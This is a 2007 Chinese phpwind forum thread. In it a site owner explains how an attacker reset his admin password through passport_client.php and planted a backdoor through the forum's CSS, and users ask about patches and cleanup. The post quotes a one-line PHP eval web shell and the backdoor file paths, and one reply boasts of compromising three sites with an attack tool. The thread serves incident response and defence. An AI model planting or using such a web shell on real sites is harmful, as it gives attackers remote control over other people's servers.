主题 : 本次密码门事件黑客攻击过程简析(含后门查找方法)
级别: 初来乍到
UID: 15949
精华: 0
发帖: 9
威望: 5 点
金钱: 98 两
贡献值: 0 点
PW积分: 0 点
在线时间: 53(时)
注册时间: 2004-07-05
最后登录: 2008-12-05
楼主  发表于: 2007-04-07 00:31

0 本次密码门事件黑客攻击过程简析(含后门查找方法)

管理提醒: 本帖被 GG 执行锁定操作(2007-04-07)
今天人比较累,不想多写了,也没多研究
刚刚上论坛发现密码被改,就来看了一下,发现是出大BUG了
打了补丁,慢慢分析了一下
大概情况如下:

攻击者IP如下:219.147.205.124 所在的地理位置为: 黑龙江省牡丹江市 电信

攻击者(以下简称JR)首先通过BAIDU查找肉鸡
该JR使用的关键字是  魔兽 公会 powered by phpwind
(估计是想盗号。。)

然后向passport_client.php页面POST了异常数据,测试过我的论坛没有打补丁后
浏览论坛找到我的管理员帐号

再次向passport_client.php页面POST了攻击代码

成功修改了我的管理员密码,进入后台
在论坛默认风格的CSS代码最后加入攻击代码
(具体代码不公布了,就是生成一个data/bbscache/admin_recors.php文件,
里面的内容是:
复制代码
  1. <?php eval($_POST[a])?>\r\n


后面他还访问了如下地址:
/data/bbscache/admin_recors.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
/data/bbscache/admin_recors.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42

最后通过
data/bbscache/require.php?action=editfile&dir=.&editfile=admin_record.php
撰改了后台管理记录


简单的说,大家首先要查的,是论坛风格的CSS代码,清除掉,然后再删除上面提到的几个后门文件

累了,还是先休息了,明天有空再仔细研究下。。

最后,还是要欢迎下大家来我的www.yybug.com坐坐,研究些技术,扯扯蛋啥的,呵呵
www.cn83.com
级别: 四星会员
UID: 1031076
精华: 0
发帖: 1244
威望: 116 点
金钱: 89 两
贡献值: 1 点
PW积分: 15 点
群组: 因为我们是NB青年!!
在线时间: 98(时)
注册时间: 2007-01-15
最后登录: 2009-05-04
沙发  发表于: 2007-04-07 00:33

    知道拉!
级别: 一星会员
UID: 456765
精华: 0
发帖: 162
威望: 29 点
金钱: 29 两
贡献值: 0 点
PW积分: 15 点
在线时间: 78(时)
注册时间: 2005-09-21
最后登录: 2009-06-03
地毯  发表于: 2007-04-07 00:34

论坛没有开放注册会被黑吗
级别: 商业版用户
UID: 350201
精华: 0
发帖: 74
威望: 26 点
金钱: 341 两
贡献值: 0 点
PW积分: 31 点
在线时间: 161(时)
注册时间: 2005-07-03
最后登录: 2009-05-24
3楼  发表于: 2007-04-07 00:38

引用
引用第2楼tjcz于2007-04-07 00:34发表的  :
论坛没有开放注册会被黑吗


会,尽快打上补丁
等待PW7.3的补丁发布,然后就升级。。。
级别: 二星会员
UID: 344388
精华: 0
发帖: 407
威望: 24 点
金钱: 175 两
贡献值: 0 点
PW积分: 6 点
在线时间: 97(时)
注册时间: 2005-06-30
最后登录: 2009-07-01
4楼  发表于: 2007-04-07 00:49

楼主辛苦了
马来西亚英迪国际大学中国留学生论坛、马来西亚综合留学娱乐中文论坛-英迪吧!~
http://www.inti8.com
级别: 初来乍到
UID: 15949
精华: 0
发帖: 9
威望: 5 点
金钱: 98 两
贡献值: 0 点
PW积分: 0 点
在线时间: 53(时)
注册时间: 2004-07-05
最后登录: 2008-12-05
5楼  发表于: 2007-04-07 00:52

一发完贴,直接被DDOS了,呵呵,,看来攻击者也不辞辛劳的蹲守在这里哇
 
级别: 一星会员
UID: 134945
精华: 0
发帖: 277
威望: 12 点
金钱: 165 两
贡献值: 0 点
PW积分: 13 点
在线时间: 237(时)
注册时间: 2004-12-30
最后登录: 2009-05-02
6楼  发表于: 2007-04-07 01:02

这个是肯定的
除非是傻子
站长交流大厅 NuoYue.Net  手机搜 sjso.cn
级别: 论坛版主
UID: 733071
精华: 0
发帖: 6027
威望: 32314 点
金钱: 827 两
贡献值: 32244 点
PW积分: 191 点
在线时间: 1354(时)
注册时间: 2006-05-18
最后登录: 2009-07-02
7楼  发表于: 2007-04-07 01:15

Lz真厉害
☞  手机搜!(SjSo.cn ) 提供最全最新的手机资源信息 ☜
☞  菜鸟、站长们的最好学习的地方 NuoYue.net  ☜
☞ ①群满 请加②号群:73085611 ☜
☞ 有问题直接点 我要问  ☜
级别: 初来乍到
UID: 494004
精华: 0
发帖: 3
威望: 1 点
金钱: 0 两
贡献值: 0 点
PW积分: 0 点
在线时间: 8(时)
注册时间: 2005-10-23
最后登录: 2009-03-29
8楼  发表于: 2007-04-07 01:21

分析的不错.
级别: 新手上路
UID: 960914
精华: 0
发帖: 85
威望: 2 点
金钱: 6 两
贡献值: 0 点
PW积分: 0 点
在线时间: 165(时)
注册时间: 2006-11-09
最后登录: 2009-04-16
9楼  发表于: 2007-04-07 03:27

那么打完补丁就被锁了,怎么办呀?刚打完补丁就发现论坛直接被锁,也就是被黑了。怎么办呀
有米有哪位高手能帮帮忙呀?
二方斋:WWW.2FANG.EB.CN
级别: 一星会员
UID: 31600
精华: 0
发帖: 252
威望: 29 点
金钱: 2 两
贡献值: 0 点
PW积分: 0 点
群组: 因为我们是NB青年!!
在线时间: 160(时)
注册时间: 2004-08-06
最后登录: 2007-11-15
10楼  发表于: 2007-04-07 03:44

admin_record.php 也要删除吗?
级别: 二星会员
UID: 1136977
精华: 0
发帖: 426
威望: 29 点
金钱: 1 两
贡献值: 0 点
PW积分: 0 点
在线时间: 66(时)
注册时间: 2007-04-05
最后登录: 2007-09-10
11楼  发表于: 2007-04-07 03:48

请问补丁哪里下载呢
级别: 初来乍到
UID: 1070878
精华: 0
发帖: 9
威望: 4 点
金钱: 0 两
贡献值: 0 点
PW积分: 0 点
在线时间: 3(时)
注册时间: 2007-02-22
最后登录: 2008-02-19
12楼  发表于: 2007-04-07 07:24

还分析条毛,打好补丁再说,那小破工具我刚才测试了一下,10分钟就搞了3个站
傻瓜式操作,谁发出来的 害人哦